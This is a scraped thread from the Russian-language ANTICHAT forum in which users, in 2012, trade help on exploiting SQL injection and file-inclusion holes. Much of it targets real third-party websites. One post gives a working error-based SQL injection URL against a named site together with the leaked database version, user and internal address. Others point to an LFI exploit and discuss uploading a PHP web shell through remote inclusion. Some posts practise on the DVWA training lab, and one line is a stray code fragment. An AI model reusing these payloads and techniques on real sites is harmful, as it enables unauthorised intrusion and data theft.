HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21421  
Старый 09.10.2012, 14:10
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от Nikel3rN  
Nikel3rN said:
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
Дальше думаю сами сможете?

Код:
Code:
http://www.l2db[dot]ru/npc/index/2/rg/all/all/8/all/\'))+and+extractvalue(1,concat(0x3a,version()))+--+-
Version: 5.1.52-log

DB_user: l2db_ru@10.0.66.21

Current_db: l2dbtest

to BigBear, поправил, Вы ошибались!
 
Ответить с цитированием

  #21422  
Старый 09.10.2012, 17:20
Lastman
Guest
Сообщений: n/a
Провел на форуме:
18452

Репутация: 0
По умолчанию

Народ нужен хелп, LFI вроде есть, но не выводится ниче.

deabloz.com/modules/boonex/poll/index.php?aModule=

Пробую данный сплоит:

1337day.com/exploits/14663
 
Ответить с цитированием

  #21423  
Старый 10.10.2012, 11:52
wkuzy
Guest
Сообщений: n/a
Провел на форуме:
1793

Репутация: -5
По умолчанию

что то не получается раскрутить,может кто подсказать

http://www.turboklicker.de/index.php?content=/nickpage&id=2
 
Ответить с цитированием

  #21424  
Старый 10.10.2012, 15:13
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от wkuzy  
wkuzy said:
что то не получается раскрутить,может кто подсказать
http://www.turboklicker.de/index.php?content=/nickpage&id=2
Указывайте, пожалуйста, параметры в которых вы подозреваете инъекцию. И способы, которые вы пробовали для их раскрутки.
 
Ответить с цитированием

  #21425  
Старый 12.10.2012, 01:31
Stricker
Guest
Сообщений: n/a
Провел на форуме:
3933

Репутация: 0
По умолчанию

Есть сайт, в при входе на него твой айпи просто проверяется в базе и если найден то Die, айпи проверяется по HTTP_X_FORWARDED_FOR, который можно заменить в хттп заголовке

Но если запрос успешен то он просто он ничего не выводит. Прав за напись нету.

Самая главная проблема вот в чем, фильтруется ',' и ';' и фильтруется таким образом, что было до нее обрезает впрочь. т.е:

x-forwarded-for: UNION SELECT ALL (SELECT, * FROM banned) -- AND users='"

А ответ MySQL ERROR 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '", 95.134.22.54'' at line 1

#0 mysql_exec(select * from banned where ip='* FROM banned) -- AND users='", Айпи тут был')
 
Ответить с цитированием

  #21426  
Старый 12.10.2012, 02:37
Tir TNT
Guest
Сообщений: n/a
Провел на форуме:
1209

Репутация: 0
По умолчанию

Спасибо.

Подскажите с SQL inj в DVWA level medium

http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit

выводит

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1
'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут

upd. разобрался. успешно прошел запрос:

Цитата:
Сообщение от None  
http://localhost/dvwa/vulnerabilities/sqli/?id=1%20and%201=1%20union%20select%20concat(versio n(),0x3a,user(),0x3a,database()),2&Submit=Submit
только не понимаю, как я это обошел, подскажите плиз.

upd2.

перешел на high. его реально пройти вообще? как выполнить xss?
 
Ответить с цитированием

  #21427  
Старый 12.10.2012, 07:07
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от None  
Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит
Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1
'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут
" if author else f"
Цитата:
Подскажите с SQL inj в DVWA level medium
http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
выводит
Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UnIoN sElECT 1,2--' at line 1
'\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут
Почитай про Magic Quotes

А вот тут можно прочитать про отличия инъекций в строковом параметре от инъекций в числовом параметре
 
Ответить с цитированием

  #21428  
Старый 14.10.2012, 01:23
mod_
Guest
Сообщений: n/a
Провел на форуме:
2855

Репутация: 0
По умолчанию

здравствуйте.

www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)

я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить

запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)
 
Ответить с цитированием

  #21429  
Старый 14.10.2012, 01:34
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

Цитата:
Сообщение от mod_  
mod_ said:
здравствуйте.
www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)
я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить
запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)
php include
 
Ответить с цитированием

  #21430  
Старый 14.10.2012, 02:17
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

mod_

вероятнее там ссылка открывается в iframe а не инклуд и тп, разберись, попробуй подключить php файлы
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ